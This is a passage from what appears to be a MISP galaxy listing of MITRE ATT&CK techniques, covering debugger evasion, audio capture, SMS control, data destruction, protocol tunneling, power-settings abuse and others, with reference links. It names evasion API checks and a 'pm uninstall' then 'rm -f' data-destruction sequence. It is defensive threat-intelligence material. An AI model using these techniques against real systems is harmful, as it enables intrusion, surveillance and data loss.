https://msdn.microsoft.com/library/aa362813.aspx

https://msdn.microsoft.com/library/windows/desktop/bb968799.aspx

https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx

https://researchcenter.paloaltonetworks.com/2017/11/unit42-uboatrat-navigates-east-asia/

https://technet.microsoft.com/library/dd939934.aspx

https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1

https://www.secureworks.com/blog/malware-lingers-with-bits

https://www.symantec.com/connect/blogs/malware-update-windows-update

Trusted Relationship - T1199

Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship abuses an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.

Organizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider’s access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.(Citation: CISA IT Service Providers)

In Office 365 environments, organizations may grant Microsoft partners or resellers delegated administrator permissions. By compromising a partner or reseller account, an adversary may be able to leverage existing delegated administrator relationships or send new delegated administrator offers to clients in order to gain administrative control over the victim tenant.(Citation: Office 365 Delegated Administration)

The tag is: misp-galaxy:mitre-attack-pattern="Trusted Relationship - T1199"

Table 6294. Table References

Links

https://attack.mitre.org/techniques/T1199

https://support.microsoft.com/en-us/topic/partners-offer-delegated-administration-26530dc0-ebba-415b-86b1-b55bc06b073e?ui=en-us&rs=en-us&ad=us

https://us-cert.cisa.gov/APTs-Targeting-IT-Service-Provider-Customers

Misattributable credentials - T1322

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1322).

The use of credentials by an adversary with the intent to hide their true identity and/or portray them self as another person or entity. An adversary may use misattributable credentials in an attack to convince a victim that credentials are legitimate and trustworthy when this is not actually the case. (Citation: FakeSSLCerts)

The tag is: misp-galaxy:mitre-attack-pattern="Misattributable credentials - T1322"

Table 6295. Table References

Links

https://attack.mitre.org/techniques/T1322

Debugger Evasion - T1622

Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)

Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.

Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>IsDebuggerPresent()</code> and <code> NtQueryInformationProcess()</code>, or manually checking the <code>BeingDebugged</code> flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)

Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as <code>OutputDebugStringW()</code>.(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Debugger Evasion - T1622"

Table 6296. Table References

Links

https://attack.mitre.org/techniques/T1622

https://github.com/LordNoteworthy/al-khaser/tree/master/al-khaser/AntiDebug

https://github.com/hasherezade/malware_training_vol1/blob/main/slides/module3/Module3_2_fingerprinting.pdf

https://github.com/processhacker/processhacker

https://github.com/vxunderground/VX-API/tree/main/Anti%20Debug

https://objective-see.com/blog/blog_0x60.html

https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/

DNS poisoning - T1382

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

DNS (cache) poisoning is the corruption of an Internet server’s domain name system table by replacing an Internet address with that of another, rogue address. When a Web user seeks the page with that address, the request is redirected by the rogue entry in the table to a different address. (Citation: Google DNS Poisoning) (Citation: DNS Poisoning China) (Citation: Mexico Modem DNS Poison)

The tag is: misp-galaxy:mitre-attack-pattern="DNS poisoning - T1382"

Table 6297. Table References

Links

https://attack.mitre.org/techniques/T1382

Process Discovery - T1424

Adversaries may attempt to get information about running processes on a device. Information obtained could be used to gain an understanding of common software/applications running on devices within a network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1424) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Recent Android security enhancements have made it more difficult to obtain a list of running processes. On Android 7 and later, there is no way for an application to obtain the process list without abusing elevated privileges. This is due to the Android kernel utilizing the hidepid mount feature. Prior to Android 7, applications could utilize the ps command or examine the /proc directory on the device.(Citation: Android-SELinuxChanges)

In iOS, applications have previously been able to use the sysctl command to obtain a list of running processes. This functionality has been removed in later iOS versions.

The tag is: misp-galaxy:mitre-attack-pattern="Process Discovery - T1424"

Table 6298. Table References

Links

https://attack.mitre.org/techniques/T1424

https://code.google.com/p/android/issues/detail?id=205565

Audio Capture - T1429

Adversaries may capture audio to collect information by leveraging standard operating system APIs of a mobile device. Examples of audio information adversaries may target include user conversations, surroundings, phone calls, or other sensitive information.

Android and iOS, by default, require that applications request device microphone access from the user.

On Android devices, applications must hold the RECORD_AUDIO permission to access the microphone or the CAPTURE_AUDIO_OUTPUT permission to access audio output. Because Android does not allow third-party applications to hold the CAPTURE_AUDIO_OUTPUT permission by default, only privileged applications, such as those distributed by Google or the device vendor, can access audio output.(Citation: Android Permissions) However, adversaries may be able to gain this access after successfully elevating their privileges. With the CAPTURE_AUDIO_OUTPUT permission, adversaries may pass the MediaRecorder.AudioSource.VOICE_CALL constant to MediaRecorder.setAudioOutput, allowing capture of both voice call uplink and downlink.(Citation: Manifest.permission)

On iOS devices, applications must include the NSMicrophoneUsageDescription key in their Info.plist file to access the microphone.(Citation: Requesting Auth-Media Capture)

The tag is: misp-galaxy:mitre-attack-pattern="Audio Capture - T1429"

Table 6299. Table References

Links

https://attack.mitre.org/techniques/T1429

https://blog.zecops.com/research/how-ios-malware-can-spy-on-users-silently/

https://developer.android.com/reference/android/Manifest.permission

https://developer.android.com/reference/android/media/MediaRecorder.AudioSource#VOICE_CALL

https://developer.apple.com/documentation/avfoundation/cameras_and_media_capture/requesting_authorization_for_media_capture_on_ios

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-19.html

https://source.android.com/devices/tech/config/privacy-indicators

Unsecured Credentials - T1552

Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).

The tag is: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552"

Table 6300. Table References

Links

https://attack.mitre.org/techniques/T1552

Impair Defenses - T1562

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.

Adversaries may also impair routine operations that contribute to defensive hygiene, such as blocking users from logging out of a computer or stopping it from being shut down. These restrictions can further enable malicious operations as well as the continued propagation of incidents.(Citation: Emotet shutdown)

Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.

The tag is: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562"

Table 6301. Table References

Links

https://attack.mitre.org/techniques/T1562

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

Protocol Tunneling - T1572

Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet.

There are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling)

[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19)

Adversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure.

The tag is: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572"

Table 6302. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1572

https://www.bleepingcomputer.com/news/security/new-godlua-malware-evades-traffic-monitoring-via-dns-over-https/

https://www.ssh.com/ssh/tunneling

SMS Control - T1582

Adversaries may delete, alter, or send SMS messages without user authorization. This could be used to hide C2 SMS messages, spread malware, or various external effects.

This can be accomplished by requesting the RECEIVE_SMS or SEND_SMS permissions depending on what the malware is attempting to do. If the app is set as the default SMS handler on the device, the SMS_DELIVER broadcast intent can be registered, which allows the app to write to the SMS content provider. The content provider directly modifies the messaging database on the device, which could allow malicious applications with this ability to insert, modify, or delete arbitrary messages on the device.(Citation: SMS KitKat)(Citation: Android SmsProvider)

The tag is: misp-galaxy:mitre-attack-pattern="SMS Control - T1582"

Table 6303. Table References

Links

https://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.html

https://android.googlesource.com/platform/packages/providers/TelephonyProvider//7e7c274/src/com/android/providers/telephony/SmsProvider.java[https://android.googlesource.com/platform/packages/providers/TelephonyProvider//7e7c274/src/com/android/providers/telephony/SmsProvider.java]

https://attack.mitre.org/techniques/T1582

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html

https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-41.html

Data Destruction - T1662

Adversaries may destroy data and files on specific devices or in large numbers to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.

To achieve data destruction, adversaries may use the pm uninstall command to uninstall packages or the rm command to remove specific files. For example, adversaries may first use pm uninstall to uninstall non-system apps, and then use rm (-f) <file(s)> to delete specific files, further hiding malicious activity.(Citation: rootnik_rooting_tool)(Citation: abuse_native_linux_tools)

The tag is: misp-galaxy:mitre-attack-pattern="Data Destruction - T1662"

Table 6304. Table References

Links

https://attack.mitre.org/techniques/T1662

https://unit42.paloaltonetworks.com/rootnik-android-trojan-abuses-commercial-rooting-tool-and-steals-private-information/

https://www.trendmicro.com/en_za/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html

Execution Guardrails - T1627

Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include environment information such as location.(Citation: SWB Exodus March 2019)

Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [System Checks](https://attack.mitre.org/techniques/T1633/001). While use of [System Checks](https://attack.mitre.org/techniques/T1633/001) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.

The tag is: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1627"

Table 6305. Table References

Links

https://attack.mitre.org/techniques/T1627

https://securitywithoutborders.org/blog/2019/03/29/exodus.html

Hide Artifacts - T1628

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Mobile operating systems have features and developer APIs to hide various artifacts, such as an application’s launcher icon. These APIs have legitimate usages, such as hiding an icon to avoid application drawer clutter when an application does not have a usable interface. Adversaries may abuse these features and APIs to hide artifacts from the user to evade detection.

The tag is: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1628"

Table 6306. Table References

Links

https://attack.mitre.org/techniques/T1628

Dumpster dive - T1286

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1286).

Dumpster diving is looking through waste for information on technology, people, and/or organizational items of interest. (Citation: FriedDumpsters)

The tag is: misp-galaxy:mitre-attack-pattern="Dumpster dive - T1286"

Table 6307. Table References

Links

https://attack.mitre.org/techniques/T1286

Impair Defenses - T1629

Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may span both native defenses as well as supplemental capabilities installed by users or mobile endpoint administrators.

The tag is: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1629"

Table 6308. Table References

Links

https://attack.mitre.org/techniques/T1629

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html

https://partner.samsungknox.com/mtd

Dynamic DNS - T1333

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1333).

Dynamic DNS is a automated method to rapidly update the domain name system mapping of hostnames to IPs. (Citation: FireEyeSupplyChain)

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1333"

Dynamic DNS - T1333 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Dynamic DNS - T1311" with estimative-language:likelihood-probability="almost-certain"

Table 6309. Table References

Links

https://attack.mitre.org/techniques/T1333

Port redirector - T1363

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1363).

Redirecting a communication request from one address and port number combination to another. May be set up to obfuscate the final location of communications that will occur in later stages of an attack. (Citation: SecureWorks HTRAN Analysis)

The tag is: misp-galaxy:mitre-attack-pattern="Port redirector - T1363"

Table 6310. Table References

Links

https://attack.mitre.org/techniques/T1363

Internal Spearphishing - T1534

Adversaries may use internal spearphishing to gain access to additional information or exploit other users within the same organization after they already have access to accounts or systems within the environment. Internal spearphishing is multi-staged campaign where an email account is owned either by controlling the user’s device with previously installed malware or by compromising the account credentials of the user. Adversaries attempt to take advantage of a trusted internal account to increase the likelihood of tricking the target into falling for the phish attempt.(Citation: Trend Micro When Phishing Starts from the Inside 2017)

Adversaries may leverage [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) or [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) as part of internal spearphishing to deliver a payload or redirect to an external site to capture credentials through [Input Capture](https://attack.mitre.org/techniques/T1056) on sites that mimic email login interfaces.

There have been notable incidents where internal spearphishing has been used. The Eye Pyramid campaign used phishing emails with malicious attachments for lateral movement between victims, compromising nearly 18,000 email accounts in the process.(Citation: Trend Micro When Phishing Starts from the Inside 2017) The Syrian Electronic Army (SEA) compromised email accounts at the Financial Times (FT) to steal additional account credentials. Once FT learned of the campaign and began warning employees of the threat, the SEA sent phishing emails mimicking the Financial Times IT department and were able to compromise even more users.(Citation: THE FINANCIAL TIMES LTD 2019.)

The tag is: misp-galaxy:mitre-attack-pattern="Internal Spearphishing - T1534"

Table 6311. Table References

Links

https://attack.mitre.org/techniques/T1534

https://blog.trendmicro.com/phishing-starts-inside/

https://labs.ft.com/2013/05/a-sobering-day/?mhq5j=e6

Credential pharming - T1374

This technique has been deprecated. Please see ATT&CK’s Initial Access and Execution tactics for replacement techniques.

Credential pharming a form of attack designed to steal users' credential by redirecting users to fraudulent websites. Pharming can be conducted either by changing the hosts file on a victim’s computer or by exploitation of a vulnerability in DNS server software. (Citation: DriveByPharming) (Citation: GoogleDrive Phishing)

The tag is: misp-galaxy:mitre-attack-pattern="Credential pharming - T1374"

Table 6312. Table References

Links

https://attack.mitre.org/techniques/T1374

Power Settings - T1653

Adversaries may impair a system’s ability to hibernate, reboot, or shut down in order to extend access to infected machines. When a computer enters a dormant state, some or all software and hardware may cease to operate which can disrupt malicious activity.(Citation: Sleep, shut down, hibernate)

Adversaries may abuse system utilities and configuration settings to maintain access by preventing machines from entering a state, such as standby, that can terminate malicious activity.(Citation: Microsoft: Powercfg command-line options)(Citation: systemdsleep Linux)

For example, powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.(Citation: Two New Monero Malware Attacks Target Windows and Android Users) Adversaries may also extend system lock screen timeout settings.(Citation: BATLOADER: The Evasive Downloader Malware) Other relevant settings, such as disk and hibernate timeout, can be similarly abused to keep the infected machine running even if no user is active.(Citation: CoinLoader: A Sophisticated Malware Loader Campaign)

Aware that some malware cannot survive system reboots, adversaries may entirely delete files used to invoke system shut down or reboot.(Citation: Condi-Botnet-binaries)

The tag is: misp-galaxy:mitre-attack-pattern="Power Settings - T1653"

Table 6313. Table References

Links

https://attack.mitre.org/techniques/T1653

https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html

https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options?adlt=strict

https://man7.org/linux/man-pages/man5/systemd-sleep.conf.5.html

https://securityintelligence.com/news/two-new-monero-malware-attacks-target-windows-and-android-users/

https://www.avg.com/en/signal/should-you-shut-down-sleep-or-hibernate-your-pc-or-mac-laptop

https://www.avira.com/en/blog/coinloader-a-sophisticated-malware-loader-campaign

https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389

Encrypted Channel - T1573

Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.

The tag is: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573"

Table 6314. Table References

Links

http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1573

https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html

Acquire Infrastructure - T1583

Adversaries may buy, lease, or rent infrastructure that can be used during targeting. A wide variety of infrastructure exists for hosting and orchestrating adversary operations. Infrastructure solutions include physical or cloud servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) Additionally, botnets are available for rent or purchase.

Use of these infrastructure solutions allows adversaries to stage, launch, and execute operations. Solutions may help adversary operations blend in with traffic that is seen as normal, such as contacting third-party web services or acquiring infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090), including from residential proxy services.(Citation: amnesty_nso_pegasus)(Citation: FBI Proxies Credential Stuffing)(Citation: Mandiant APT29 Microsoft 365 2022) Depending on the implementation, adversaries may use infrastructure that makes it difficult to physically tie back to them as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.

The tag is: misp-galaxy:mitre-attack-pattern="Acquire Infrastructure - T1583"

Table 6315. Table References

Links

https://attack.mitre.org/techniques/T1583

https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://threatconnect.com/blog/infrastructure-research-hunting/

https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/

https://www.ic3.gov/Media/News/2022/220818.pdf

https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Dynamic Resolution - T1637

Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware’s communications. This algorithm can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.

The tag is: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1637"

Table 6316. Table References

Links

https://attack.mitre.org/techniques/T1637

https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/

Device Lockout - T1446

An adversary may seek to lock the legitimate user out of the device, for example to inhibit user interaction or to obtain a ransom payment.

On Android versions prior to 7, apps can abuse Device Administrator access to reset the device lock passcode to prevent the user from unlocking the device. After Android 7, only device or profile owners (e.g. MDMs) can reset the device’s passcode.(Citation: Android resetPassword)

On iOS devices, this technique does not work because mobile device management servers can only remove the screen lock passcode, they cannot set a new passcode. However, on jailbroken devices, malware has been discovered that can lock the user out of the device.(Citation: Xiao-KeyRaider)

The tag is: misp-galaxy:mitre-attack-pattern="Device Lockout - T1446"

Table 6317. Table References

Links

http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/

https://attack.mitre.org/techniques/T1446

https://developer.android.com/reference/android/app/admin/DevicePolicyManager.html#resetPassword(java.lang.String,%20int)

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-28.html

Hide Artifacts - T1564

Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)

Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)

The tag is: misp-galaxy:mitre-attack-pattern="Hide Artifacts - T1564"

Table 6318. Table References

Links

https://attack.mitre.org/techniques/T1564

https://blog.malwarebytes.com/101/2015/07/introduction-to-alternate-data-streams/

https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf

https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

Log Enumeration - T1654

Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).

Host binaries may be leveraged to collect system logs. Examples include using wevtutil.exe or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s CollectGuestLogs.exe to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)

Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.

The tag is: misp-galaxy:mitre-attack-pattern="Log Enumeration - T1654"

Table 6319. Table References

Links

https://attack.mitre.org/techniques/T1654

https://labs.withsecure.com/content/dam/labs/docs/WithSecure-Lazarus-No-Pineapple-Threat-Intelligence-Report-2023.pdf

https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial

https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/

Compromise Infrastructure - T1584

Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.

Use of compromised infrastructure allows adversaries to stage, launch, and execute operations. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may also compromise infrastructure to support [Proxy](https://attack.mitre.org/techniques/T1090) and/or proxyware services.(Citation: amnesty_nso_pegasus)(Citation: Sysdig Proxyjacking)

By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Infrastructure - T1584"

Table 6320. Table References

Links

https://attack.mitre.org/techniques/T1584

https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf

https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2

https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/

https://threatconnect.com/blog/infrastructure-research-hunting/

https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

https://www.amnesty.org/en/latest/research/2021/07/forensic-methodology-report-how-to-catch-nso-groups-pegasus/

https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

https://www.icann.org/groups/ssac/documents/sac-007-en

https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation

Data Destruction - T1485

Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as <code>del</code> and <code>rm</code> often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk’s logical structure.

Adversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)

To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).

In cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ - Cisco Insider)

The tag is: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485"

Table 6321. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

https://attack.mitre.org/techniques/T1485

https://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

https://threatpost.com/hacker-puts-hosting-service-code-spaces-out-of-business/106761/

https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/

https://www.fireeye.com/blog/threat-research/2016/11/fireeye_respondsto.html

https://www.justice.gov/usao-ndca/pr/san-jose-man-pleads-guilty-damaging-cisco-s-network

https://www.symantec.com/connect/blogs/shamoon-attacks

Firmware Corruption - T1495

Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot, thus denying the availability to use the devices and/or the system.(Citation: Symantec Chernobyl W95.CIH) Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices may include the motherboard, hard drive, or video cards.

